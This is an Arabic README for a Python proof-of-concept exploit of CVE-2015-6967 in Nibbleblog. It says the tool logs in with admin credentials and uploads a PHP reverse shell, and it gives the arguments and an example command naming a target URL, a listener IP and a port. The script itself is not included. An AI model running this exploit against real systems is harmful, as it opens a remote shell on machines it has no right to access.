
استغلال PoC لـ CVE-2015-6967
استغلال PoC لـ CVE-2015-6967
يستغل هذا السكربت المكتوب بلغة بايثون ثغرة في Nibbleblog (CVE-2015-6967) لرفع شل عكسي على الهدف المستضعف. يأخذ السكربت من المستخدم عنوان URL للهدف، وبيانات اعتماد المستخدم، وعنوان IP/منفذ المضيف الخاص بك، ثم يشرع في استغلال الثغرة برفع شل عكسي بلغة PHP.
هذا السكربت مخصص للأغراض التعليمية فقط. لا تستخدمه في أنشطة غير قانونية. احصل دائمًا على إذن صريح قبل اختبار أو استغلال أي ثغرات على أنظمة لا تملكها أو ليس لديك الإذن بالوصول إليها.
requestsargparsecoloramapyfigletيمكنك تثبيت التبعيات المطلوبة باستخدام الأمر التالي:
pip install requests colorama pyfiglet
الاستخدام
يتطلب السكربت عدة معاملات للتشغيل: url: عنوان URL لـ Nibbleblog الهدف (مثال: http://10.10.14.14/nibbleblog) -U, --user: اسم المستخدم لمدير Nibbleblog -P, --password: كلمة مرور مدير Nibbleblog -p, --host-port: المنفذ المحلي الذي سيتصل به الشل العكسي -H, --host-ip: عنوان IP المحلي الذي سيتصل به الشل العكسي
مثال
python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100